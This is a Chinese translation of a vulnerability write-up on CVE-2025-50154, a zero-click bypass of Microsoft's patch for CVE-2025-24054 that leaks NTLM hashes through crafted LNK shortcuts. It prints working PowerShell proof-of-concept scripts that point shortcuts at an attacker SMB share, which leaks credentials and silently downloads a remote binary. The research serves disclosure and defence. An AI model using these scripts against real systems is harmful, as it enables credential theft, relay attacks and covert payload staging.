文章总结: 本文介绍了CVE-2025-50154漏洞,该漏洞允许攻击者在零点击情况下绕过微软针对CVE-2025-24054的安全补丁,从完全更新的Windows系统中泄露NTLM凭证。研究人员通过修改LNK快捷方式文件,将目标路径指向远程可执行文件,同时将图标位置设置为本地默认图标库,从而触发NTLM身份验证请求并泄露用户哈希。此漏洞不仅导致凭证泄露,还允许攻击者在用户不知情的情况下下载恶意二进制文件,为后续攻击提供基础。文章强调了补丁验证和纵深防御策略的重要性。
综合评分: 85
文章分类: 漏洞分析,漏洞预警,网络安全,渗透测试,安全建设
零点击导致 NTLM 凭证泄露:绕过微软安全补丁漏洞 (CVE-2025-50154)
Ruben Enkaoua
securitainment
2025年8月14日 13:37
中国香港
翻译自 Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)
免责声明:本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。
执行摘要
作为在 Cymulate 研究实验室持续进行的安全研究的一部分,我发现了一个零点击 (zero-click) NTLM 凭据泄露漏洞,该漏洞绕过了微软针对 CVE-2025-24054 的补丁。原漏洞展示了特制的请求如何触发 NTLM 身份验证并暴露敏感凭据。尽管微软通过一次安全更新解决了此问题,但我们的测试表明该补丁并不完善。
这个新漏洞现已被分配为 CVE-2025-50154,它允许攻击者在无需任何用户交互的情况下,即可从一台完全更新的系统上提取 NTLM 哈希。通过利用补丁中一个微妙的缺陷,攻击者可以自动触发 NTLM 身份验证请求,从而实现离线破解或中继攻击 (relay attacks),以获取未授权的访问权限。
此漏洞风险极高:NTLM 中继攻击可导致权限提升、横向移动和远程代码执行 (RCE),尤其是在针对高价值账户时。由于此漏洞利用无需用户交互,它为那些仅依赖微软四月补丁来防护的组织增加了攻击面。
我们已负责任地将此发现披露给微软安全响应中心 (MSRC),该漏洞也已被正式分配了独立的 CVE 编号。预计微软将发布新的安全更新以完全解决此问题。
介绍
NTLM 是微软推出的一个身份验证协议套件,用于确认用户身份并保护网络通信。它通过一个直接的客户端 – 服务器“挑战/响应”模式运作,即服务器发出一个挑战,客户端在无需通过网络传输实际密码的情况下证明其身份。
虽然 NTLMv2 可以抵御彩虹表和哈希传递 (pass-the-hash) 等预计算攻击,但捕获的哈希仍然可以被利用。攻击者可能会尝试离线暴力破解这些哈希,或使用中继攻击——这是一种中间人攻击方法,攻击者将窃取的哈希传递给另一个服务,以冒充用户登录。如果被盗用的账户拥有高权限,这可能迅速导致权限提升和在网络中的横向移动。
事实上,Check Point 曾发布一篇博客详细介绍了 CVE-2025-24054。然而,即使在微软修补该问题后,我们仍然找到了绕过补丁的方法并成功获取 NTLM 哈希,证明了该威胁并未被完全消除。
旧的漏洞
为了重现此漏洞的原始状态,我设置了一台未安装任何安全更新的 Windows 10 虚拟机。
我启动了一个 SMB 服务器来监听传入的 SMB 连接,并使用 Wireshark 嗅探器来分析客户端行为,旨在从一个 ICO 图标文件中泄露哈希。
$shortcutPath = "C:\Users\Cymuser\Desktop\LAB\lab.lnk"$targetPath = "C:\Windows\System32\notepad.exe"$iconLocation = "\\192.168.159.129\share\icon.ico"
# 创建一个 WScript.Shell COM 对象$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)$shortcut.TargetPath = $targetPath$shortcut.IconLocation = $iconLocation$shortcut.Save()
Write-Output "快捷方式创建于: $shortcutPath"
这段脚本会创建一个 LNK 快捷方式文件,其图标指向一个远程 SMB 共享。当在文件资源管理器中查看此快捷方式时,系统会尝试渲染远程图标,从而导致当前用户的 NTLMv2-SSP 哈希被泄露。
捕获的哈希:
在已应用补丁的系统上,Windows 的安全更新会阻止这种情况。我在另一台打过补丁的 Windows 10 虚拟机上测试了相同的内容:
运行相同的脚本后,图标未能成功加载:
我们可以看到,与之前的情况相反,图标没有被渲染,同时也没有哈希值被泄露。
绕过漏洞
绕过方法需要对脚本进行修改:将快捷方式的“目标路径”(TargetPath) 指向一个远程可执行文件,同时将“图标位置”(IconLocation) 设置为一个本地的默认图标库(如 shell32.dll)。
$shortcutPath = "C:\Users\Cymuser\Desktop\LAB\lab.lnk"$targetPath = "\\192.168.159.129\share\execute.exe"$iconLocation = "C:\Windows\System32\SHELL32.dll"
$wShell = New-Object -ComObject WScript.Shell$shortcut = $wShell.CreateShortcut($shortcutPath)$shortcut.TargetPath = $targetPath$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "快捷方式创建于: $shortcutPath"
它是如何工作的
例如,当我们查看一个指向 Chrome 等程序的桌面快捷方式时,即使没有明确配置“图标位置”,其图标依然能正常显示。
这是因为 explorer.exe进程会直接从目标可执行文件的 .rsrc资源段中,通过 RT_ICON和 RT_GROUP_ICON头来检索图标。
微软的补丁专注于阻止快捷方式从 UNC 路径渲染图标,但未考虑到远程二进制文件自身就包含图标数据的情况。
执行脚本:
无需用户点击,explorer.exe进程为了获取图标,不仅会读取 .rsrc段,还会下载整个远程二进制文件。
NTLMv2-SSP 哈希被泄露:
此外,如 Wireshark 所示,整个二进制文件在没有任何点击的情况下被传输:
这意味着,整个文件在用户毫不知情的情况下被自动下载。尽管文件不会立即执行,但这种行为依然非常危险,因为它允许攻击者在未经同意的情况下将恶意载荷 (payload) 直接传送到受害者的系统。由于在此阶段没有进程执行发生,许多安全工具可能会忽略此活动,导致文件未被检测到。
一旦文件存在于系统上,该二进制文件可能在之后被触发,使攻击者能够部署恶意软件、窃取凭据或在网络中进行横向移动 (lateral movement)。即使没有立即执行,以这种方式暂存恶意二进制文件的能力也构成了严重风险,因为它为更高级、更具破坏性的攻击铺平了道路。
如 Wireshark 导出所示,文件被成功检索:
从 Sysinternals Procmon 的监控中可以看到,文件被创建:
并且二进制文件的大小被分配:
结论
此漏洞凸显了安全补丁中一个看似微小的疏忽,也可能使系统面临严重威胁。通过绕过 CVE-2025-24054 的修复,攻击者不仅可以在零点击的情况下泄露 NTLM 哈希,还可以在无需用户交互的情况下静默下载远程二进制文件。虽然这些二进制文件不会立即执行,但它们在目标系统上的存在为攻击者提供了一个立足点,以便稍后发起更具破坏性的攻击,例如凭据窃取、部署勒索软件或进行横向移动。
凭据泄露与隐蔽载荷投递的组合,展示了攻击者如何将多个弱点串联成一条强大的攻击链。它强调了即使对于供应商认为已修复的漏洞,也需要进行彻底的补丁验证、实施纵深防御策略以及持续性安全测试的必要性。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:securitainment Ruben Enkaoua《零点击导致 NTLM 凭证泄露:绕过微软安全补丁漏洞 (CVE-2025-50154)》